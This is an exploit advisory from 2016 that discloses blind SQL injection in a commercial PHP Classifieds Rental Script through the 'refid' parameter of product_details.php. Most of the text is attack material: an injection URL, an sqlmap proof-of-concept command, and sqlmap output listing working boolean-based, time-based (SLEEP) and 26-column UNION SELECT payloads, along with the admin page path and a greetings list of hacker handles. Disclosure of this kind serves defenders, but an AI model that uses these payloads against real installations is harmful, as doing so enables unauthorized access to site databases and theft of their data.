[x]========================================================================================================================================[x]
| Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities
| Software : PHP Classifieds Rental Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 99
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
an easy-to- use software, this Property Rental Script
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: refid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]